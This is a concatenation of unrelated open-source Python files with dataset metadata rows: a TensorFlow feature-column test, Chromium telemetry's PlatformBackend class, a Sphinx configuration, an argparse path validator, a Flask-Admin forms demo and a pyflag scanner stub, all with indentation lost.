_, sequence_length = _get_sequence_dense_tensor(
indicator_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
class SequenceNumericColumnTest(test.TestCase, parameterized.TestCase):
def test_defaults(self):
a = sfc.sequence_numeric_column('aaa')
self.assertEqual('aaa', a.key)
self.assertEqual('aaa', a.name)
self.assertEqual((1,), a.shape)
self.assertEqual(0., a.default_value)
self.assertEqual(dtypes.float32, a.dtype)
self.assertIsNone(a.normalizer_fn)
def test_shape_saved_as_tuple(self):
a = sfc.sequence_numeric_column('aaa', shape=[1, 2])
self.assertEqual((1, 2), a.shape)
def test_shape_must_be_positive_integer(self):
with self.assertRaisesRegexp(TypeError, 'shape dimensions must be integer'):
sfc.sequence_numeric_column('aaa', shape=[1.0])
with self.assertRaisesRegexp(
ValueError, 'shape dimensions must be greater than 0'):
sfc.sequence_numeric_column('aaa', shape=[0])
def test_dtype_is_convertible_to_float(self):
with self.assertRaisesRegexp(
ValueError, 'dtype must be convertible to float'):
sfc.sequence_numeric_column('aaa', dtype=dtypes.string)
def test_normalizer_fn_must_be_callable(self):
with self.assertRaisesRegexp(TypeError, 'must be a callable'):
sfc.sequence_numeric_column('aaa', normalizer_fn='NotACallable')
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, values [0., 1]
# example 1, [10.]
'indices': ((0, 0), (0, 1), (1, 0)),
'values': (0., 1., 10.),
'dense_shape': (2, 2)},
'expected': [
[[0.], [1.]],
[[10.], [0.]]]},
{'testcase_name': '3D',
'inputs_args': {
# feature 0, ids [[20, 3], [5]]
# feature 1, ids [[3], [8]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (20, 3, 5., 3., 8.),
'dense_shape': (2, 2, 2)},
'expected': [
[[20.], [3.], [5.], [0.]],
[[3.], [0.], [8.], [0.]]]},
)
def test_get_sequence_dense_tensor(self, inputs_args, expected):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
numeric_column = sfc.sequence_numeric_column('aaa')
dense_tensor, _ = _get_sequence_dense_tensor(
numeric_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected, dense_tensor.eval(session=sess))
def test_get_sequence_dense_tensor_with_normalizer_fn(self):
def _increment_two(input_sparse_tensor):
return sparse_ops.sparse_add(
input_sparse_tensor,
sparse_tensor.SparseTensor(((0, 0), (1, 1)), (2.0, 2.0), (2, 2))
)
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, values [[0.], [1]]
# example 1, [[10.]]
indices=((0, 0), (0, 1), (1, 0)),
values=(0., 1., 10.),
dense_shape=(2, 2))
# Before _increment_two:
# [[0.], [1.]],
# [[10.], [0.]],
# After _increment_two:
# [[2.], [1.]],
# [[10.], [2.]],
expected_dense_tensor = [
[[2.], [1.]],
[[10.], [2.]],
]
numeric_column = sfc.sequence_numeric_column(
'aaa', normalizer_fn=_increment_two)
dense_tensor, _ = _get_sequence_dense_tensor(
numeric_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_dense_tensor, dense_tensor.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [[[0., 1.], [2., 3.]], [[4., 5.], [6., 7.]]]
# example 1, [[[10., 11.], [12., 13.]]]
'indices': ((0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6),
(0, 7), (1, 0), (1, 1), (1, 2), (1, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 8)},
'expected_dense_tensor': [
[[[0., 1.], [2., 3.]], [[4., 5.], [6., 7.]]],
[[[10., 11.], [12., 13.]], [[0., 0.], [0., 0.]]]]},
{'testcase_name': '3D',
'sparse_input_args': {
'indices': ((0, 0, 0), (0, 0, 2), (0, 0, 4), (0, 0, 6),
(0, 1, 0), (0, 1, 2), (0, 1, 4), (0, 1, 6),
(1, 0, 0), (1, 0, 2), (1, 0, 4), (1, 0, 6)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 2, 8)},
'expected_dense_tensor': [
[[[0., 0.], [1., 0.]], [[2., 0.], [3., 0.]],
[[4., 0.], [5., 0.]], [[6., 0.], [7., 0.]]],
[[[10., 0.], [11., 0.]], [[12., 0.], [13., 0.]],
[[0., 0.], [0., 0.]], [[0., 0.], [0., 0.]]]]},
)
def test_get_dense_tensor_multi_dim(
self, sparse_input_args, expected_dense_tensor):
"""Tests get_sequence_dense_tensor for multi-dim numeric_column."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=(2, 2))
dense_tensor, _ = _get_sequence_dense_tensor(
numeric_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_dense_tensor, dense_tensor.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2., 0., 1.),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 2],
'shape': (1,)},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2., 0., 1., 2.),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2],
'shape': (1,)},
{'testcase_name': '2D_with_shape',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2., 0., 1.),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 1],
'shape': (2,)},
{'testcase_name': '3D_with_shape',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2., 0., 1., 2.),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2],
'shape': (2,)},
)
def test_sequence_length(self, inputs_args, expected_sequence_length, shape):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=shape)
_, sequence_length = _get_sequence_dense_tensor(
numeric_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
sequence_length = sess.run(sequence_length)
self.assertAllEqual(expected_sequence_length, sequence_length)
self.assertEqual(np.int64, sequence_length.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, values []
# example 1, values [[0.], [1.]]
# example 2, [[2.]]
# example 3, values []
# example 4, [[3.]]
# example 5, values []
indices=((1, 0), (1, 1), (2, 0), (4, 0)),
values=(0., 1., 2., 3.),
dense_shape=(6, 2))
expected_sequence_length = [0, 2, 1, 0, 1, 0]
numeric_column = sfc.sequence_numeric_column('aaa')
_, sequence_length = _get_sequence_dense_tensor(
numeric_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
if __name__ == '__main__':
test.main()
| apache-2.0 | 134,761,447,103,843,000 | 39.377049 | 101 | 0.56151 | false |
Workday/OpenFrame | tools/telemetry/telemetry/internal/platform/platform_backend.py | 8 | 8451 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import weakref
from telemetry.internal.forwarders import do_nothing_forwarder
from telemetry.internal.platform import network_controller_backend
from telemetry.internal.platform import tracing_controller_backend
# pylint: disable=unused-argument
class PlatformBackend(object):
def __init__(self, device=None):
""" Initalize an instance of PlatformBackend from a device optionally.
Call sites need to use SupportsDevice before intialization to check
whether this platform backend supports the device.
If device is None, this constructor returns the host platform backend
which telemetry is running on.
Args:
device: an instance of telemetry.core.platform.device.Device.
"""
if device and not self.SupportsDevice(device):
raise ValueError('Unsupported device: %s' % device.name)
self._platform = None
self._running_browser_backends = weakref.WeakSet()
self._network_controller_backend = None
self._tracing_controller_backend = None
self._forwarder_factory = None
def InitPlatformBackend(self):
self._network_controller_backend = (
network_controller_backend.NetworkControllerBackend(self))
self._tracing_controller_backend = (
tracing_controller_backend.TracingControllerBackend(self))
@classmethod
def IsPlatformBackendForHost(cls):
""" Returns whether this platform backend is the platform backend to be used
for the host device which telemetry is running on. """
return False
@classmethod
def SupportsDevice(cls, device):
""" Returns whether this platform backend supports intialization from the
device. """
return False
@classmethod
def CreatePlatformForDevice(cls, device, finder_options):
raise NotImplementedError
def SetPlatform(self, platform):
assert self._platform == None
self._platform = platform
@property
def platform(self):
return self._platform
@property
def is_host_platform(self):
return self._platform.is_host_platform
@property
def running_browser_backends(self):
return list(self._running_browser_backends)
@property
def network_controller_backend(self):
return self._network_controller_backend
@property
def tracing_controller_backend(self):
return self._tracing_controller_backend
@property
def forwarder_factory(self):
if not self._forwarder_factory:
self._forwarder_factory = do_nothing_forwarder.DoNothingForwarderFactory()
return self._forwarder_factory
def GetRemotePort(self, port):
return port
def DidCreateBrowser(self, browser, browser_backend):
browser_options = browser_backend.browser_options
self.SetFullPerformanceModeEnabled(browser_options.full_performance_mode)
# TODO(slamm): Remove this call when replay browser_backend dependencies
# get moved to platform. https://crbug.com/423962
self._network_controller_backend.UpdateReplay(browser_backend)
def DidStartBrowser(self, browser, browser_backend):
assert browser not in self._running_browser_backends
self._running_browser_backends.add(browser_backend)
def WillCloseBrowser(self, browser, browser_backend):
# TODO(slamm): Move this call when replay's life cycle is no longer
# tied to the browser. https://crbug.com/424777
self._network_controller_backend.StopReplay()
is_last_browser = len(self._running_browser_backends) <= 1
if is_last_browser:
self.SetFullPerformanceModeEnabled(False)
self._running_browser_backends.discard(browser_backend)
@property
def wpr_http_device_port(self):
return self._network_controller_backend.wpr_http_device_port
@property
def wpr_https_device_port(self):
return self._network_controller_backend.wpr_https_device_port
def IsDisplayTracingSupported(self):
return False
def StartDisplayTracing(self):
"""Start gathering a trace with frame timestamps close to physical
display."""
raise NotImplementedError()
def StopDisplayTracing(self):
"""Stop gathering a trace with frame timestamps close to physical display.
Returns a raw tracing events that contains the timestamps of physical
display.
"""
raise NotImplementedError()
def SetFullPerformanceModeEnabled(self, enabled):
pass
def CanMonitorThermalThrottling(self):
return False
def IsThermallyThrottled(self):
raise NotImplementedError()
def HasBeenThermallyThrottled(self):
raise NotImplementedError()
def GetSystemCommitCharge(self):
raise NotImplementedError()
def GetSystemTotalPhysicalMemory(self):
raise NotImplementedError()
def GetCpuStats(self, pid):
return {}
def GetCpuTimestamp(self):
return {}
def PurgeUnpinnedMemory(self):
pass
def GetMemoryStats(self, pid):
return {}
def GetChildPids(self, pid):
raise NotImplementedError()
def GetCommandLine(self, pid):
raise NotImplementedError()
def GetDeviceTypeName(self):
raise NotImplementedError()
def GetArchName(self):
raise NotImplementedError()
def GetOSName(self):
raise NotImplementedError()
def GetOSVersionName(self):
raise NotImplementedError()
def CanFlushIndividualFilesFromSystemCache(self):
raise NotImplementedError()
def FlushEntireSystemCache(self):
raise NotImplementedError()
def FlushSystemCacheForDirectory(self, directory):
raise NotImplementedError()
def FlushDnsCache(self):
pass
def LaunchApplication(
self, application, parameters=None, elevate_privilege=False):
raise NotImplementedError()
def IsApplicationRunning(self, application):
raise NotImplementedError()
def CanLaunchApplication(self, application):
return False
def InstallApplication(self, application):
raise NotImplementedError()
def CanCaptureVideo(self):
return False
def StartVideoCapture(self, min_bitrate_mbps):
raise NotImplementedError()
@property
def is_video_capture_running(self):
return False
def StopVideoCapture(self):
raise NotImplementedError()
def CanMonitorPower(self):
return False
def CanMeasurePerApplicationPower(self):
return False
def StartMonitoringPower(self, browser):
raise NotImplementedError()
def StopMonitoringPower(self):
raise NotImplementedError()
def CanMonitorNetworkData(self):
return False
def GetNetworkData(self, browser):
raise NotImplementedError()
def ReadMsr(self, msr_number, start=0, length=64):
"""Read a CPU model-specific register (MSR).
Which MSRs are available depends on the CPU model.
On systems with multiple CPUs, this function may run on any CPU.
Args:
msr_number: The number of the register to read.
start: The least significant bit to read, zero-indexed.
(Said another way, the number of bits to right-shift the MSR value.)
length: The number of bits to read. MSRs are 64 bits, even on 32-bit CPUs.
"""
raise NotImplementedError()
@property
def wpr_ca_cert_path(self):
return None
def CanTakeScreenshot(self):
return False
def TakeScreenshot(self, file_path):
raise NotImplementedError
def IsCooperativeShutdownSupported(self):
"""Indicates whether CooperativelyShutdown, below, is supported.
It is not necessary to implement it on all platforms."""
return False
def CooperativelyShutdown(self, proc, app_name):
"""Cooperatively shut down the given process from subprocess.Popen.
Currently this is only implemented on Windows. See
crbug.com/424024 for background on why it was added.
Args:
proc: a process object returned from subprocess.Popen.
app_name: on Windows, is the prefix of the application's window
class name that should be searched for. This helps ensure
that only the application's windows are closed.
Returns True if it is believed the attempt succeeded.
"""
raise NotImplementedError()
def PathExists(self, path, timeout=None, retries=None):
"""Tests whether the given path exists on the target platform.
Args:
path: path in request.
timeout: timeout.
retries: num of retries.
Return:
Whether the path exists on the target platform.
"""
raise NotImplementedError()
| bsd-3-clause | -1,934,696,983,969,230,300 | 27.744898 | 80 | 0.732221 | false |
simone-campagna/shells-kitchen | docs/source/conf.py | 1 | 11364 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Shell's Kitchen documentation build configuration file, created by
# sphinx-quickstart on Mon Feb 22 09:09:41 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
napoleon_use_param = True
# Intersphinx python
intersphinx_mapping = {'python': ('https://docs.python.org/3.4', None)}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'shells kitchen'
copyright = '2016, Simone Campagna'
author = 'Simone Campagna'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = '0.10.1'
# The short X.Y version.
version = release.rsplit('.', 1)[0]
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
pass
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ShellsKitchendoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ShellsKitchen.tex', 'Shell\'s Kitchen Documentation',
'Simone Campagna', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'shellskitchen', 'Shell\'s Kitchen Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ShellsKitchen', 'Shell\'s Kitchen Documentation',
author, 'ShellsKitchen', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| apache-2.0 | -2,112,141,964,533,189,000 | 30.21978 | 79 | 0.702834 | false |
ksylvan/python-vipaccess | vipaccess/patharg.py | 1 | 2560 | # https://mail.python.org/pipermail/stdlib-sig/2015-July/000990.html
from argparse import ArgumentTypeError as err
import os
class PathType(object):
def __init__(self, exists=True, type='file', dash_ok=True):
'''exists:
True: a path that does exist
False: a path that does not exist, in a valid parent directory
None: don't care
type: file, dir, symlink, None, or a function returning True for valid paths
None: don't care
dash_ok: whether to allow "-" as stdin/stdout'''
assert exists in (True, False, None)
assert type in ('file','dir','symlink',None) or hasattr(type,'__call__')
self._exists = exists
self._type = type
self._dash_ok = dash_ok
def __call__(self, string):
if string=='-':
# the special argument "-" means sys.std{in,out}
if self._type == 'dir':
raise err('standard input/output (-) not allowed as directory path')
elif self._type == 'symlink':
raise err('standard input/output (-) not allowed as symlink path')
elif not self._dash_ok:
raise err('standard input/output (-) not allowed')
else:
e = os.path.exists(string)
if self._exists==True:
if not e:
raise err("path does not exist: '%s'" % string)
if self._type is None:
pass
elif self._type=='file':
if not os.path.isfile(string):
raise err("path is not a file: '%s'" % string)
elif self._type=='symlink':
if not os.path.symlink(string):
raise err("path is not a symlink: '%s'" % string)
elif self._type=='dir':
if not os.path.isdir(string):
raise err("path is not a directory: '%s'" % string)
elif not self._type(string):
raise err("path not valid: '%s'" % string)
else:
if self._exists==False and e:
raise err("path exists: '%s'" % string)
p = os.path.dirname(os.path.normpath(string)) or '.'
if not os.path.isdir(p):
raise err("parent path is not a directory: '%s'" % p)
elif not os.path.exists(p):
raise err("parent directory does not exist: '%s'" % p)
return string
| apache-2.0 | 5,135,719,561,126,125,000 | 40.967213 | 87 | 0.501172 | false |
marty331/jakesclock | flask/lib/python2.7/site-packages/examples/forms/app.py | 2 | 7444 | import os
import os.path as op
from flask import Flask, url_for
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.event import listens_for
from jinja2 import Markup
from flask_admin import Admin, form
from flask_admin.form import rules
from flask_admin.contrib import sqla
# Create application
app = Flask(__name__, static_folder='files')
# Create dummy secrey key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['DATABASE_FILE'] = 'sample_db.sqlite'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + app.config['DATABASE_FILE']
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create directory for file fields to use
file_path = op.join(op.dirname(__file__), 'files')
try:
os.mkdir(file_path)
except OSError:
pass
# Create models
class File(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(64))
path = db.Column(db.Unicode(128))
def __unicode__(self):
return self.name
class Image(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Unicode(64))
path = db.Column(db.Unicode(128))
def __unicode__(self):
return self.name
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.Unicode(64))
last_name = db.Column(db.Unicode(64))
email = db.Column(db.Unicode(128))
phone = db.Column(db.Unicode(32))
city = db.Column(db.Unicode(128))
country = db.Column(db.Unicode(128))
notes = db.Column(db.UnicodeText)
# Delete hooks for models, delete files if models are getting deleted
@listens_for(File, 'after_delete')
def del_file(mapper, connection, target):
if target.path:
try:
os.remove(op.join(file_path, target.path))
except OSError:
# Don't care if was not deleted because it does not exist
pass
@listens_for(Image, 'after_delete')
def del_image(mapper, connection, target):
if target.path:
# Delete image
try:
os.remove(op.join(file_path, target.path))
except OSError:
pass
# Delete thumbnail
try:
os.remove(op.join(file_path,
form.thumbgen_filename(target.path)))
except OSError:
pass
# Administrative views
class FileView(sqla.ModelView):
# Override form field to use Flask-Admin FileUploadField
form_overrides = {
'path': form.FileUploadField
}
# Pass additional parameters to 'path' to FileUploadField constructor
form_args = {
'path': {
'label': 'File',
'base_path': file_path,
'allow_overwrite': False
}
}
class ImageView(sqla.ModelView):
def _list_thumbnail(view, context, model, name):
if not model.path:
return ''
return Markup('<img src="%s">' % url_for('static',
filename=form.thumbgen_filename(model.path)))
column_formatters = {
'path': _list_thumbnail
}
# Alternative way to contribute field is to override it completely.
# In this case, Flask-Admin won't attempt to merge various parameters for the field.
form_extra_fields = {
'path': form.ImageUploadField('Image',
base_path=file_path,
thumbnail_size=(100, 100, True))
}
class UserView(sqla.ModelView):
"""
This class demonstrates the use of 'rules' for controlling the rendering of forms.
"""
form_create_rules = [
# Header and four fields. Email field will go above phone field.
rules.FieldSet(('first_name', 'last_name', 'email', 'phone'), 'Personal'),
# Separate header and few fields
rules.Header('Location'),
rules.Field('city'),
# String is resolved to form field, so there's no need to explicitly use `rules.Field`
'country',
# Show macro from Flask-Admin lib.html (it is included with 'lib' prefix)
rules.Container('rule_demo.wrap', rules.Field('notes'))
]
# Use same rule set for edit page
form_edit_rules = form_create_rules
create_template = 'rule_create.html'
edit_template = 'rule_edit.html'
# Flask views
@app.route('/')
def index():
return '<a href="/admin/">Click me to get to Admin!</a>'
# Create admin
admin = Admin(app, 'Example: Forms')
# Add views
admin.add_view(FileView(File, db.session))
admin.add_view(ImageView(Image, db.session))
admin.add_view(UserView(User, db.session, name='User'))
def build_sample_db():
"""
Populate a small db with some example entries.
"""
import random
import string
db.drop_all()
db.create_all()
first_names = [
'Harry', 'Amelia', 'Oliver', 'Jack', 'Isabella', 'Charlie','Sophie', 'Mia',
'Jacob', 'Thomas', 'Emily', 'Lily', 'Ava', 'Isla', 'Alfie', 'Olivia', 'Jessica',
'Riley', 'William', 'James', 'Geoffrey', 'Lisa', 'Benjamin', 'Stacey', 'Lucy'
]
last_names = [
'Brown', 'Smith', 'Patel', 'Jones', 'Williams', 'Johnson', 'Taylor', 'Thomas',
'Roberts', 'Khan', 'Lewis', 'Jackson', 'Clarke', 'James', 'Phillips', 'Wilson',
'Ali', 'Mason', 'Mitchell', 'Rose', 'Davis', 'Davies', 'Rodriguez', 'Cox', 'Alexander'
]
locations = [
("Shanghai", "China"),
("Istanbul", "Turkey"),
("Karachi", "Pakistan"),
("Mumbai", "India"),
("Moscow", "Russia"),
("Sao Paulo", "Brazil"),
("Beijing", "China"),
("Tianjin", "China"),
("Guangzhou", "China"),
("Delhi", "India"),
("Seoul", "South Korea"),
("Shenzhen", "China"),
("Jakarta", "Indonesia"),
("Tokyo", "Japan"),
("Mexico City", "Mexico"),
("Kinshasa", "Democratic Republic of the Congo"),
("Bangalore", "India"),
("New York City", "United States"),
("London", "United Kingdom"),
("Bangkok", "Thailand"),
("Tehran", "Iran"),
("Dongguan", "China"),
("Lagos", "Nigeria"),
("Lima", "Peru"),
("Ho Chi Minh City", "Vietnam"),
]
for i in range(len(first_names)):
user = User()
user.first_name = first_names[i]
user.last_name = last_names[i]
user.email = user.first_name.lower() + "@example.com"
tmp = ''.join(random.choice(string.digits) for i in range(10))
user.phone = "(" + tmp[0:3] + ") " + tmp[3:6] + " " + tmp[6::]
user.city = locations[i][0]
user.country = locations[i][1]
db.session.add(user)
images = ["Buffalo", "Elephant", "Leopard", "Lion", "Rhino"]
for name in images:
image = Image()
image.name = name
image.path = name.lower() + ".jpg"
db.session.add(image)
for i in [1, 2, 3]:
file = File()
file.name = "Example " + str(i)
file.path = "example_" + str(i) + ".pdf"
db.session.add(file)
db.session.commit()
return
if __name__ == '__main__':
# Build a sample db on the fly, if one does not exist yet.
app_dir = op.realpath(os.path.dirname(__file__))
database_path = op.join(app_dir, app.config['DATABASE_FILE'])
if not os.path.exists(database_path):
build_sample_db()
# Start app
app.run(debug=True)
| gpl-2.0 | -308,090,450,717,494,340 | 28.422925 | 94 | 0.582214 | false |
arkem/pyflag | src/plugins/DiskForensics/FileHandlers/Extractor.py | 2 | 2151 | """ This is a scanner which utilises libextractor to collect metadata
about some files.
"""
from pyflag.Scanner import *
import pyflag.Reports as Reports
from pyflag.ColumnTypes import StringType, TimestampType, InodeIDType
active = False
try:
import extractor
E = extractor.Extractor()
